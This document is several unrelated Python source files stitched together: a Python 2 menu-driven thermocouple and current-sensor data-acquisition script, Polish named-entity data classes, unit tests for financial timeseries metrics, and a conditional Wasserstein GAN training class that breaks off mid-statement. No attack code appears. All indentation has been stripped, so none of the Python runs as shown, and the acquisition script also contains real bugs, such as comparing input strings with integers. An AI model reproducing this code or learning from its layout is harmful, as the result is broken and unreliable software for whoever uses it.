# Function to toggle the thermocouple sensors between enabled and disabled
#-----------------------------------------------------------------
def thermoEnDis():
thermoLoop = False
#Loop until Q
while thermoLoop == False:
#Get thermocouple keys
thermoKeys = thermoLabels.keys()
#Sort the keys
thermoKeys.sort()
#Print the dictionary information
for entry in thermoKeys:
print entry + "\t-\t" + thermoLabels[entry] + "\t-\t" + thermoStatus[entry]
thermoChoice = raw_input("Select thermocouple to toggle (Q to quit): ")
#Based on the selection, toggle the Thermocouple
if thermoChoice == 'T0':
thermoStatus['T0'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T1':
thermoStatus['T1'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T2':
thermoStatus['T2'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T3':
thermoStatus['T3'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T4':
thermoStatus['T4'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T5':
thermoStatus['T5'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T6':
thermoStatus['T6'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice == 'T7':
thermoStatus['T7'] = toggleSensor(thermoLabels[thermoChoice], thermoStatus[thermoChoice])
elif thermoChoice.upper() == 'Q':
thermoLoop = True
else:
print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to change the thermocouple label
#-----------------------------------------------------------------
def thermoInput(tempChoice):
validFlag = False
#Loop until valid
while validFlag == False:
#prompt the user and get the input
print "Selected " + tempChoice + " to change. Please enter new label : "
newLabel = raw_input()
#Check for blank input
if newLabel == '':
print "Cannot be blank!\n"
#Label valid, return the new label
else:
print "Label changed to " + newLabel
return newLabel
#-----------------------------------------------------------------
# function to select the thermocouple labels
#-----------------------------------------------------------------
def setThermocoupleLables():
thermoLoop = False
#Loop until Q is chosen
while thermoLoop == False:
#Get the thermocouple keys
thermoKeys = thermoLabels.keys()
# Sort the thermocouple keys
thermoKeys.sort()
#Print the thermocouple dictionary
for entry in thermoKeys:
print entry, " - ", thermoLabels[entry]
#Select the thermocouple label to change
thermoChoice = raw_input("Select label to change (Q to quit): ")
if thermoChoice == 'T0':
thermoLabels['T0'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T1':
thermoLabels['T1'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T2':
thermoLabels['T2'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T3':
thermoLabels['T3'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T4':
thermoLabels['T4'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T5':
thermoLabels['T5'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T6':
thermoLabels['T6'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice == 'T7':
thermoLabels['T7'] = thermoInput(thermoLabels[thermoChoice])
elif thermoChoice.upper() == 'Q':
thermoLoop = True
else:
print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to set the sample rate
#-----------------------------------------------------------------
def setSampleRate():
#Bring in global variable
global sampleRate
validFlag = False
#Loop until selection is valid
while validFlag == False:
#Prompt the user and get the user input
print "Please enter a sample rate in milliseconds (10 is the minimum): "
tempSample = raw_input()
#Check to make sure it is a number
if tempSample.isdigit() == False:
print "Must be a number.\n"
#Answer cannot be blank
elif tempSample == '':
print "Cannot be a blank input!\n"
#Valid input
else:
#If the input is less than 10 (min), then set it to minimum
if tempSample <= 10:
sampleRate = 10
print "Sample rate set to 10ms\n"
validFlag = True
#If greater then min, set the value
else:
sampleRate = tempSample
print "Sample rate set to " + sampleRate + "ms\n"
validFlag = True
#-----------------------------------------------------------------
# Funtion to set the filename
#-----------------------------------------------------------------
def setFileName():
#Bring in the global variable
global filePath
validFlag = False
#Loop until the data is valid
while validFlag == False:
#Prompt the user and get the input
print "Please enter a filename to store the data (no extension): "
fileName = raw_input()
#can't be blank
if fileName == '':
print "Cannot be a blank input!\n"
#Can only be alphanumeric
elif fileName.isalnum() == False:
print "Can only be alphanumeric!\n"
#Data is valid
else:
#Check to see if the file already exist
tempPath = storagePath + fileName + fileExt
if os.path.isfile(tempPath):
print "File Already Exist. Please use a different name.\n"
#unique and can be set
else:
print "Valid file. Path set to: " + tempPath + "\n"
filePath = fileName
validFlag = True
#-----------------------------------------------------------------
# Function to change the temperature unit
#-----------------------------------------------------------------
def unitChange():
#Pull in global variables
global temperatureUnit
validFlag = False
#Loop until Q
while validFlag == False:
#print the menu and get user response
print "Please choose a unit for temperature: "
print "C:\tCelsius"
print "F:\tFahrenheit"
print "B:\tBoth"
print "Q:\tQuit"
unitChoice = raw_input("Please select the unit: ")
#Cannot be blank
if unitChoice == '':
print "Cannot be blank input!\n"
#Not blank, check valid
else:
#Set the units
if unitChoice.upper() == 'C':
temperatureUnit = "C"
print "Changed units to Celsius.\n"
elif unitChoice.upper() == 'F':
temperatureUnit = "F"
print "Changed units to Fahrenheit.\n"
elif unitChoice.upper() == 'B':
temperatureUnit = "B"
print "Changed units to Both.\n"
elif unitChoice.upper() == 'Q':
validFlag = True
else:
print "Not valid\n"
#-----------------------------------------------------------------
# Function to display all the settings that are being used for the test
#-----------------------------------------------------------------
def displayAllSettings():
# Print the header
print "-------------------------------------------------\n"
print "Current Settings\n"
print "-------------------------------------------------\n"
#Filename
print "Filepath: " + os.getcwd() + storagePath + filePath + fileExt + "\n"
#Sample Rates
print "Sample Rate: " + str(sampleRate) + "\n"
#current sensors
print "Current Sensors:"
#Label, Net, Enable/Disable
currentKeys = currentLabels.keys()
for entry in currentKeys:
print entry + "\t-\t" + currentLabels[entry] + "\t-\t" + currentStatus[entry]
#thermocouple sensors
print "\nThermocouple Sensors:"
#channel, Label, Address, Enable/Disable
thermoKeys = thermoLabels.keys()
thermoKeys.sort()
for entry in thermoKeys:
print entry + "\t-\t" + thermoLabels[entry] + "\t-\t" + thermoAddress[entry] + "\t-\t" + thermoStatus[entry]
#units
print "\nTemperature Unit: " + temperatureUnit
#-----------------------------------------------------------------
# Function to return list of all the enabled current sensors
#-----------------------------------------------------------------
def getCurrentEnabled():
# Get current keys
currentKeys = currentLabels.keys()
currentKeys.sort()
# Create blank list
currentList = []
# If the item is enabled, add it to the list
for entry in currentKeys:
if currentStatus[entry] == "Enabled":
currentList.append(entry)
# Return the list
return currentList
#-----------------------------------------------------------------
# Function to return list of all the thermocouple sensors
#-----------------------------------------------------------------
def getThermoEnabled():
# Get thermocouple keys
thermoKeys = thermoLabels.keys()
thermoKeys.sort()
# Create blank list
thermoList = []
# If the item is enabled, add it to the list
for entry in thermoKeys:
if thermoStatus[entry] == "Enabled":
thermoList.append(entry)
# Return the list
return thermoList
#-----------------------------------------------------------------
# Function to return the temperature reading
#-----------------------------------------------------------------
def temp_raw(tempSensor):
# Open Bus
f = open(tempSensor, 'r')
# Read response
lines = f.readlines()
# Close
f.close()
# Return data
return lines
def convertToF(tempC):
return tempC * 9.0 / 5.0 + 32.0
def getTemperatureValue(tempKey):
lines = temp_raw(tcStart + thermoAddress[tempKey] + tcEnd)
while lines[0].strip()[-3:] != 'YES':
#time.sleep(0.2)
lines = temp_raw(tcStart + thermoAddress[tempKey] + tcEnd)
temp_output = lines[1].find('t=')
if temp_output != -1:
temp_string = lines[1].strip()[temp_output+2:]
temp_c = float(temp_string) / 1000.0
return temp_c
def getADCValues():
values = [0]*4
for i in range(4):
# Read the specified ADC channel using the previously set gain value.
values[i] = adc.read_adc(i, gain=GAIN)
return values
#-----------------------------------------------------------------
# Function to get data and convert it to a usable format
#-----------------------------------------------------------------
def runDAQ():
global startTime
colprint = '|{:10}|'
formatprint = 'Time (ms)'
colHeaders = ['Time (ms)']
#Get all the current sensors that are valid
for items in getCurrentEnabled():
colprint += ' {:>5} |'
colHeaders.append(items)
#Get all the thermocouple sensors that are valid
for items in getThermoEnabled():
colprint += ' {:>5} |'
colHeaders.append(items)
print colprint.format(*colHeaders)
try:
while True:
rowVals = []
currentTime = time.time()
# Get current sensor, Get thermocouple
rowVals.append("{:7.2f}".format(currentTime - startTime))
#for items in getCurrentEnabled():
rowVals.extend(getADCValues())
for items in getThermoEnabled():
temp_c = getTemperatureValue(items)
rowVals.append(temp_c)
print colprint.format(*rowVals)
#time.sleep(0.1)
except KeyboardInterrupt:
return
#-----------------------------------------------------------------
# Function to start the DAQ
#-----------------------------------------------------------------
def startDAQ():
global startTime
# Print the header
print "------------------------------------------------\n"
print "Data Acquistion\n"
print "------------------------------------------------\n"
#Display the settings
print "Settings: "
displayAllSettings()
validFlag = False
#While choice isn't valid
while validFlag == False:
# Make sure the user wants to run the test
print "\n Data acquistion will run until Ctrl+C is pressed. Press R to continue or Q to abort"
menuInput = raw_input()
# Check the input
if menuInput.upper() == "R":
print "Starting...."
validFlag = True
elif menuInput.upper() == "Q":
print "Aborting..."
validFlag = True
else:
print "Invalid input\n"
# if R, run the test, or abort
if menuInput.upper() == "R":
startTime = time.time()
runDAQ()
else:
return
#-----------------------------------------------------------------
# Function to auto detect what sensors are valid
#-----------------------------------------------------------------
def autoDetectSensors():
# try to get values for thermocouples, if above range, set as disabled
thermoKeys = thermoLabels.keys()
thermoKeys.sort()
for sensors in thermoKeys:
temp_c = getTemperatureValue(sensors)
if temp_c >= 1000 and thermoStatus[sensors] == "Enabled":
thermoStatus[sensors] = toggleSensor(thermoLabels[sensors], thermoStatus[sensors])
elif temp_c < 1000 and thermoStatus[sensors] == "Disabled":
thermoStatus[sensors] = toggleSensor(thermoLabels[sensors], thermoStatus[sensors])
# try to get current sensor value, if out of range, disabled
print getADCValues()
return
#-----------------------------------------------------------------
# Function to analyze the menu choice
#-----------------------------------------------------------------
def menuAnalysis(userChoice):
if userChoice.upper() == 'F':
setFileName()
elif userChoice.upper() == 'R':
setSampleRate()
elif userChoice.upper() == 'T':
setThermocoupleLables()
elif userChoice.upper() == 'C':
setCurrentLabels()
elif userChoice.upper() == 'D':
displayAllSettings()
elif userChoice.upper() == 'S':
startDAQ()
elif userChoice.upper() == 'Q':
print "Thanks!"
sys.exit(0)
elif userChoice.upper() == 'E':
thermoEnDis()
elif userChoice.upper() == 'M':
print "Set modes"
elif userChoice.upper() == 'N':
currentEnDis()
elif userChoice.upper() == 'U':
unitChange()
elif userChoice.upper() == 'A':
autoDetectSensors()
else:
print "Not valid"
#handle ctrl+c press
signal.signal(signal.SIGINT, signal_handler)
#-----------------------------------------------------------------
# Function for the main menu
#-----------------------------------------------------------------
while (menuChoice.upper() != 'Q'):
options = menu.keys()
for entry in options:
print entry, menu[entry]
menuChoice = raw_input("Please Select: ")
menuAnalysis(menuChoice)
print "\n"
|
|
# encoding: utf-8
import re
from itertools import izip
from crf.data.dataset import DataSet, divide_data, divide_in_two
CASES = ["nom", "gen", "dat", "acc", "inst", "loc", "voc"]
CASE_REGEX = re.compile("(^|:)(%s)($|:)" % '|'.join(CASES))
class Segment(object):
def __init__(self, id, orth="?", base="?", pos="?", morph="?", nps=False):
self._id = id
self._nps = nps
self._orth = orth
self._base = base
self._pos = pos
self._morph = morph
self._case = self._get_case(morph)
@property
def id(self):
return self._id
@property
def nps(self):
return self._nps
@property
def orth(self):
return self._orth
@property
def base(self):
return self._base
@property
def pos(self):
return self._pos
def _get_case(self, morph):
match = CASE_REGEX.search(morph)
assert match != None if self._pos in ["subst", "depr", "ger",
"ppron12", "ppron3", "num", "numcol", "adj", "pact",
"ppas", "prep", "siebie"] else match == None
if match != None:
return match.group(2)
return None
@property
def case(self):
return self._case
@property
def morph(self):
return self._morph
def __eq__(self, other):
return (self.id, self.orth, self.base, self.pos, self.morph) \
== (other.id, other.orth, other.base, other.pos, other.morph)
def __hash__(self):
return hash(self.id)
def __repr__(self):
return ('Segment(id=%s, orth=%s, interp=%s)' \
% (self.id,
self.orth,
':'.join([self.base, self.pos, self.morph]))) \
.encode('utf-8', 'ignore')
class DummySegment(Segment):
def __init__(self, id):
Segment.__init__(self, id, "?", "?", "?", "?")
def __repr__(self):
return "DummySegment(id=%s)" % self.id
class NamedEntity(object):
def __init__(self,
id,
type,
subtype,
ptrs,
base=None,
derivType=None,
derivedFrom=None):
self._id = id
self._type = type
self._subtype = subtype
self._ptrs = ptrs
self._base = base
self._derivType = derivType
self._derivedFrom = derivedFrom
@property
def id(self):
return self._id
@id.setter
def id(self, id):
self._id = id
@property
def type(self):
return self._type
@property
def subtype(self):
return self._subtype
@property
def ptrs(self):
return self._ptrs
@property
def derivType(self):
return self._derivType
@property
def derivedFrom(self):
return self._derivedFrom
@property
def base(self):
return self._base
def get_segs(self):
res = []
for ptr in self.ptrs:
if isinstance(ptr, Segment):
res.append(ptr)
else:
res.extend(ptr.get_segs())
return res
def get_child_segs(self):
return [ptr for ptr in self.ptrs if isinstance(ptr, Segment)]
def get_child_names(self):
return [ptr for ptr in self.ptrs if isinstance(ptr, NamedEntity)]
def get_descendant_names_and_self(self):
return [self] + self.get_descendant_names()
def get_descendant_names(self):
res = []
for name in self.get_child_names():
res.extend(name.get_descendant_names_and_self())
return res
def get_label(self):
if self.subtype != None:
out = self.type + "." + self.subtype
else:
out = self.type
if self.derivType != None:
out = out + "@" + self.derivType
return out
def _get_orth(self):
out = []
for ptr in self.ptrs:
if isinstance(ptr, NamedEntity):
out.append(ptr._get_orth())
else:
if not ptr.nps:
out.append(' ')
out.append(ptr.orth)
return ''.join(out)
@property
def orth(self):
return self._get_orth().strip()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self.id)
def _ptrs_str(self):
res = ['[']
for ptr in self.ptrs:
res.append(ptr.id)
if len(self.ptrs) > 1:
res.append(', ')
res.append(']')
return ''.join(res)
def __repr__(self):
out = ['NamedEntity(']
out.append('id=%s, type=%s, ' % (self.id, self.type))
if self.subtype is not None:
out.append('subtype=%s, ' % self.subtype)
if self.base is not None:
out.append('base=%s, ' % self.base)
if self.derivType is not None:
out.append('derivType=%s, ' % self.derivType)
if self.derivedFrom is not None:
out.append('derivedFrom=%s, ' % self.derivedFrom)
out.append('ptrs=%s)' % self._ptrs_str())
return ''.join(out)
def __str__(self):
val = ""
for seg in sorted(self.get_segs(), key=lambda seg: seg.id):
val += str(seg) + "\n"
return val.strip()
def flatten(l):
result = []
for subl in l:
result.extend(subl)
return result
def join_names(names1, names2, discard_nested=True):
"""Try to put NEs from names2 list to names1 list; return joined lists."""
if discard_nested != True:
raise NotImplementedError
coverage = set(flatten(ne.get_segs() for ne in names1))
result = names1
for ne in names2:
if set(ne.get_segs()) & coverage == set():
result.append(ne)
return result
class NerDataSet(DataSet):
"""CRF DataSet extended with NEs for each sentence."""
def __init__(self, rdata, *args, **kwargs):
self.raw_data = [raw_sent for raw_sent, _ in rdata]
DataSet.__init__(self, [sent for _, sent in rdata], *args, **kwargs)
def iterator(self):
return ((raw_sent, sent)
for raw_sent, sent
in izip(self.raw_data, self.data))
def divide(self, n, stat=(lambda x: 1)):
"""Divide dataset data to n parts."""
return divide_data(self.iterator(), self.dirs, n, stat=stat)
def divide_in_two(self, r):
return divide_in_two(self.iterator(), self.dirs, r)
def filter_raw(data):
return [sent for (raw_sent, sent) in data]
|
|
from __future__ import division
from unittest import TestCase
from nose_parameterized import parameterized
import numpy as np
import pandas as pd
import pandas.util.testing as pdt
from .. import timeseries
from .. import utils
DECIMAL_PLACES = 8
class TestDrawdown(TestCase):
px_list_1 = np.array(
[100, 120, 100, 80, 70, 110, 180, 150]) / 100. # Simple
px_list_2 = np.array(
[100, 120, 100, 80, 70, 80, 90, 90]) / 100. # Ends in drawdown
dt = pd.date_range('2000-1-3', periods=8, freq='D')
@parameterized.expand([
(pd.Series(px_list_1,
index=dt),
pd.Timestamp('2000-1-4'),
pd.Timestamp('2000-1-7'),
pd.Timestamp('2000-1-9')),
(pd.Series(px_list_2,
index=dt),
pd.Timestamp('2000-1-4'),
pd.Timestamp('2000-1-7'),
None)
])
def test_get_max_drawdown(
self, px, expected_peak, expected_valley, expected_recovery):
rets = px.pct_change().iloc[1:]
peak, valley, recovery = timeseries.get_max_drawdown(rets)
# Need to use isnull because the result can be NaN, NaT, etc.
self.assertTrue(
pd.isnull(peak)) if expected_peak is None else self.assertEqual(
peak,
expected_peak)
self.assertTrue(
pd.isnull(valley)) if expected_valley is None else \
self.assertEqual(
valley,
expected_valley)
self.assertTrue(
pd.isnull(recovery)) if expected_recovery is None else \
self.assertEqual(
recovery,
expected_recovery)
@parameterized.expand([
(pd.Series(px_list_2,
index=dt),
pd.Timestamp('2000-1-4'),
pd.Timestamp('2000-1-7'),
None,
None),
(pd.Series(px_list_1,
index=dt),
pd.Timestamp('2000-1-4'),
pd.Timestamp('2000-1-7'),
pd.Timestamp('2000-1-9'),
4)
])
def test_gen_drawdown_table(self, px, expected_peak,
expected_valley, expected_recovery,
expected_duration):
rets = px.pct_change().iloc[1:]
drawdowns = timeseries.gen_drawdown_table(rets, top=1)
self.assertTrue(
pd.isnull(
drawdowns.loc[
0,
'peak date'])) if expected_peak is None \
else self.assertEqual(drawdowns.loc[0, 'peak date'],
expected_peak)
self.assertTrue(
pd.isnull(
drawdowns.loc[0, 'valley date'])) \
if expected_valley is None else self.assertEqual(
drawdowns.loc[0, 'valley date'],
expected_valley)
self.assertTrue(
pd.isnull(
drawdowns.loc[0, 'recovery date'])) \
if expected_recovery is None else self.assertEqual(
drawdowns.loc[0, 'recovery date'],
expected_recovery)
self.assertTrue(
pd.isnull(drawdowns.loc[0, 'duration'])) \
if expected_duration is None else self.assertEqual(
drawdowns.loc[0, 'duration'], expected_duration)
def test_drawdown_overlaps(self):
# Add test to show that drawdowns don't overlap
# Bug #145 observed for FB stock on the period 2014-10-24 - 2015-03-19
# Reproduced on SPY data (cached) but need a large number of drawdowns
spy_rets = utils.get_symbol_rets('SPY',
start='1997-01-01',
end='2004-12-31')
spy_drawdowns = timeseries.gen_drawdown_table(spy_rets, top=20).sort(
'peak date')
# Compare the recovery date of each drawdown with the peak of the next
# Last pair might contain a NaT if drawdown didn't finish, so ignore it
pairs = list(zip(spy_drawdowns['recovery date'],
spy_drawdowns['peak date'].shift(-1)))[:-1]
for recovery, peak in pairs:
self.assertLessEqual(recovery, peak)
@parameterized.expand([
(pd.Series(px_list_1 - 1, index=dt), -0.44000000000000011)
])
def test_max_drawdown(self, returns, expected):
self.assertEqual(timeseries.max_drawdown(returns), expected)
@parameterized.expand([
(pd.Series(px_list_1 - 1, index=dt), -0.44000000000000011)
])
def test_max_drawdown_underwater(self, underwater, expected):
self.assertEqual(timeseries.max_drawdown(underwater), expected)
@parameterized.expand([
(pd.Series(px_list_1,
index=dt),
1,
[(pd.Timestamp('2000-01-03 00:00:00'),
pd.Timestamp('2000-01-03 00:00:00'),
pd.Timestamp('2000-01-03 00:00:00'))])
])
def test_top_drawdowns(self, returns, top, expected):
self.assertEqual(
timeseries.get_top_drawdowns(
returns,
top=top),
expected)
class TestCumReturns(TestCase):
dt = pd.date_range('2000-1-3', periods=3, freq='D')
@parameterized.expand([
(pd.Series([.1, -.05, .1], index=dt),
pd.Series([1.1, 1.1 * .95, 1.1 * .95 * 1.1], index=dt), 1.),
(pd.Series([np.nan, -.05, .1], index=dt),
pd.Series([1., 1. * .95, 1. * .95 * 1.1], index=dt), 1.),
])
def test_expected_result(self, input, expected, starting_value):
output = timeseries.cum_returns(input, starting_value=starting_value)
pdt.assert_series_equal(output, expected)
class TestVariance(TestCase):
@parameterized.expand([
(1e7, 0.5, 1, 1, -10000000.0)
])
def test_var_cov_var_normal(self, P, c, mu, sigma, expected):
self.assertEqual(
timeseries.var_cov_var_normal(
P,
c,
mu,
sigma),
expected)
class TestNormalize(TestCase):
dt = pd.date_range('2000-1-3', periods=8, freq='D')
px_list = [1.0, 1.2, 1.0, 0.8, 0.7, 0.8, 0.8, 0.8]
@parameterized.expand([
(pd.Series(np.array(px_list) * 100, index=dt),
pd.Series(px_list, index=dt))
])
def test_normalize(self, returns, expected):
self.assertTrue(timeseries.normalize(returns).equals(expected))
class TestAggregateReturns(TestCase):
simple_rets = pd.Series(
[0.1] * 3 + [0] * 497,
pd.date_range(
'2000-1-3',
periods=500,
freq='D'))
@parameterized.expand([
(simple_rets, 'yearly', [0.3310000000000004, 0.0]),
(simple_rets[:100], 'monthly', [0.3310000000000004, 0.0, 0.0, 0.0]),
(simple_rets[:20], 'weekly', [0.3310000000000004, 0.0, 0.0])
])
def test_aggregate_rets(self, returns, convert_to, expected):
self.assertEqual(
timeseries.aggregate_returns(
returns,
convert_to).values.tolist(),
expected)
class TestStats(TestCase):
simple_rets = pd.Series(
[0.1] * 3 + [0] * 497,
pd.date_range(
'2000-1-3',
periods=500,
freq='D'))
simple_week_rets = pd.Series(
[0.1] * 3 + [0] * 497,
pd.date_range(
'2000-1-31',
periods=500,
freq='W'))
simple_month_rets = pd.Series(
[0.1] * 3 + [0] * 497,
pd.date_range(
'2000-1-31',
periods=500,
freq='M'))
simple_benchmark = pd.Series(
[0.03] * 4 + [0] * 496,
pd.date_range(
'2000-1-1',
periods=500,
freq='D'))
px_list = np.array(
[10, -10, 10]) / 100. # Ends in drawdown
dt = pd.date_range('2000-1-3', periods=3, freq='D')
@parameterized.expand([
(simple_rets, 'calendar', utils.DAILY, 0.10584000000000014),
(simple_rets, 'compound', utils.DAILY, 0.16317653888658334),
(simple_rets, 'calendar', utils.DAILY, 0.10584000000000014),
(simple_rets, 'compound', utils.DAILY, 0.16317653888658334),
(simple_week_rets, 'compound', utils.WEEKLY, 0.031682168889005213),
(simple_week_rets, 'calendar', utils.WEEKLY, 0.021840000000000033),
(simple_month_rets, 'compound', utils.MONTHLY, 0.0072238075842128158),
(simple_month_rets, 'calendar', utils.MONTHLY, 0.0050400000000000071)
])
def test_annual_ret(self, returns, style, period, expected):
self.assertEqual(
timeseries.annual_return(
returns,
style=style, period=period),
expected)
@parameterized.expand([
(simple_rets, utils.DAILY, 0.12271674212427248),
(simple_rets, utils.DAILY, 0.12271674212427248),
(simple_week_rets, utils.WEEKLY, 0.055744909991675112),
(simple_week_rets, utils.WEEKLY, 0.055744909991675112),
(simple_month_rets, utils.MONTHLY, 0.026778988562993072),
(simple_month_rets, utils.MONTHLY, 0.026778988562993072)
])
def test_annual_volatility(self, returns, period, expected):
self.assertAlmostEqual(
timeseries.annual_volatility(
returns,
period=period
),
expected,
DECIMAL_PLACES
)
@parameterized.expand([
(simple_rets, 'calendar', 0.8624740045072119),
(simple_rets, 'compound', 1.3297007080039505)
])
def test_sharpe(self, returns, returns_style, expected):
self.assertAlmostEqual(
timeseries.sharpe_ratio(
returns,
returns_style=returns_style),
expected, DECIMAL_PLACES)
@parameterized.expand([
(simple_rets[:5], 2, '[nan, inf, inf, 11.224972160321828, inf]')
])
def test_sharpe_2(self, returns, rolling_sharpe_window, expected):
self.assertEqual(str(timeseries.rolling_sharpe(
returns, rolling_sharpe_window).values.tolist()), expected)
@parameterized.expand([
(simple_rets, 0.010766923838471554)
])
def test_stability_of_timeseries(self, returns, expected):
self.assertAlmostEqual(
timeseries.stability_of_timeseries(returns),
expected, DECIMAL_PLACES)
@parameterized.expand([
(simple_rets[:5], simple_benchmark[:5], 2, 8.024708101613483e-32)
])
def test_beta(self, returns, benchmark_rets, rolling_window, expected):
self.assertEqual(
timeseries.rolling_beta(
returns,
benchmark_rets,
rolling_window=rolling_window).values.tolist()[2],
expected)
@parameterized.expand([
(pd.Series(px_list,
index=dt), 'calendar', -8.3999999999999559),
(pd.Series(px_list,
index=dt), 'arithmetic', 84.000000000000014)
])
def test_calmar(self, returns, returns_style, expected):
self.assertEqual(
timeseries.calmar_ratio(
returns,
returns_style=returns_style),
expected)
@parameterized.expand([
(pd.Series(px_list,
index=dt), 0.0, 2.0)
])
def test_omega(self, returns, annual_return_threshhold, expected):
self.assertEqual(
timeseries.omega_ratio(
returns,
annual_return_threshhold=annual_return_threshhold),
expected)
@parameterized.expand([
(-simple_rets[:5], -12.29634091915152),
(-simple_rets, -1.2296340919151518),
(simple_rets, np.inf)
])
def test_sortino(self, returns, expected):
self.assertAlmostEqual(
timeseries.sortino_ratio(returns),
expected, DECIMAL_PLACES)
class TestMultifactor(TestCase):
simple_rets = pd.Series(
[0.1] * 3 + [0] * 497,
pd.date_range(
'2000-1-1',
periods=500,
freq='D'))
simple_benchmark_rets = pd.DataFrame(
pd.Series(
[0.03] * 4 + [0] * 496,
pd.date_range(
'2000-1-1',
periods=500,
freq='D')),
columns=['bm'])
@parameterized.expand([
(simple_rets[:4], simple_benchmark_rets[:4], [2.5000000000000004])
])
def test_calc_multifactor(self, returns, factors, expected):
self.assertEqual(
timeseries.calc_multifactor(
returns,
factors).values.tolist(),
expected)
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the training process for a Wassersten GAN
with Gradient Penalty [https://arxiv.org/abs/1704.00028].
"""
import tensorflow as tf
from audio_synthesis.models import wgan
SHUFFLE_BUFFER_SIZE = 300
def _compute_losses(discriminator, d_real, d_fake, interpolated_x, interpolated_c):
"""Base implementation of the function that computes the WGAN
generator and disciminator losses.
Args:
discriminator: The discriminator function.
d_real: The discriminator score for the real data points.
d_fake: The discriminator score for the fake data points.
interpolated_x: The interpolation between the real and fake
data points.
interpolated_c: The interpolation between the real and fake
conditioning.
Returns:
g_loss: The loss for the generator function.
d_loss: The loss for the discriminator function.
"""
wasserstein_distance = tf.reduce_mean(d_real) - tf.reduce_mean(d_fake)
gradient_penalty_x = wgan.compute_gradient_penalty(
lambda interpolated: discriminator(interpolated, interpolated_c),
interpolated_x
)
gradient_penalty_c = wgan.compute_gradient_penalty(
lambda interpolated: discriminator(interpolated_x, interpolated),
interpolated_c
)
g_loss = tf.reduce_mean(d_fake)
d_loss = wasserstein_distance + (
wgan.GRADIENT_PENALTY_LAMBDA * gradient_penalty_x +
wgan.GRADIENT_PENALTY_LAMBDA * gradient_penalty_c
)
return g_loss, d_loss
class ConditionalWGAN(wgan.WGAN): # pylint: disable=too-many-instance-attributes
"""Implements the training procedure for Wasserstein GAN [1] with Gradient Penalty [2] in
a conditional setting.
This class extends the training procedure for an arbatrary Wasserstein GAN [1] using
the Gradient Penalty [2] technique for enforcing the required Lipschitz contraint. The
current implementation uses a uniform prior distrubution, U(-1, 1).
[1] Wasserstein GAN - https://arxiv.org/abs/1701.07875.
[2] Improved Training of Wasserstein GANs - https://arxiv.org/abs/1704.00028.
"""
def __init__(self, raw_dataset, raw_conditioning_dataset, generator,
discriminator, z_dim, generator_optimizer, discriminator_optimizer,
discriminator_training_ratio=5, batch_size=64, epochs=1, checkpoint_dir=None,
epochs_per_save=10, fn_compute_loss=_compute_losses,
fn_get_discriminator_input_representations=wgan.get_representations,
fn_save_examples=None):
"""Initilizes the WGAN class.
Paramaters:
raw_dataset: A numpy array containing the training dataset.
raw_conditioning_dataset: A numpy array containing the conditioning information.
Should be aligned with raw_dataset, and contain the same number of
elements.
generator: The generator model.
discriminator: A list of discriminator models. If only one
discriminator then a singleton list should be given.
z_dim: The number of latent features.
generator_optimizer: The optimizer for the generator model.
discriminator_optimizer: The discriminator for the discriminator.
discriminator_training_ratio: The number of discriminator updates
per generator update. Default is 5.
batch_size: Number of elements in each batch.
epochs: Number of epochs of the training set.
checkpoint_dir: Directory in which the model weights are saved. If
None, then the model is not saved.
epochs_per_save: How often the model weights are saved.
fn_compute_loss: The function that computes the generator and
discriminator loss. Must have signature
f(model, d_real, d_fake, interpolated).
fn_get_discriminator_input_representations: A function that takes
a data point (real and fake) and produces a list of representations,
one for each discriminator. Default is an identity function.
Signature expected is f(x_in), result should be an N element list
of representations.
fn_save_examples: A function to save generations and real data,
called after every epoch.
"""
super(ConditionalWGAN, self).__init__(
raw_conditioning_dataset, generator, discriminator, z_dim,
generator_optimizer, discriminator_optimizer, discriminator_training_ratio,
batch_size, epochs, checkpoint_dir, epochs_per_save, fn_compute_loss,
fn_get_discriminator_input_representations, fn_save_examples
)
self.raw_x_dataset = raw_dataset
self.conditioned_dataset = tf.data.Dataset.from_tensor_slices(
(raw_dataset, raw_conditioning_dataset)).shuffle(
self.buffer_size).repeat(self.discriminator_training_ratio).batch(
self.batch_size, drop_remainder=False)
def _train_step(self, data_in, train_generator=True, train_discriminator=True):
"""Executes one training step of the WGAN model.
Paramaters:
data_in: One batch of training data. Has the form ((x_in, c_in), c_gen_in).
Where (x_in, c_in) is jointly sampled and c_gen_in is sampled from the
conditional margional.
train_generator: If true, the generator weights will be updated.
train_discriminator: If true, the discriminator weights will be updated.
"""
xc_in, c_gen_in = data_in
x_in, c_in = xc_in
x_in_representations = self.fn_get_discriminator_input_representations(x_in)
with tf.GradientTape() as gen_tape:
g_loss = 0
z_in = tf.random.uniform((x_in.shape[0], self.z_dim), -1, 1)
x_gen = self.generator(z_in, c_gen_in, training=True)
x_gen_representations = self.fn_get_discriminator_input_representations(x_gen)
for i in range(len(self.discriminator)):
with tf.GradientTape() as disc_tape:
d_real = self.discriminator[i](
x_in_representations[i], c_in, training=True
)
d_fake = self.discriminator[i](
x_gen_representations[i], c_gen_in, training=True
)
x_interpolation = wgan.get_interpolation(
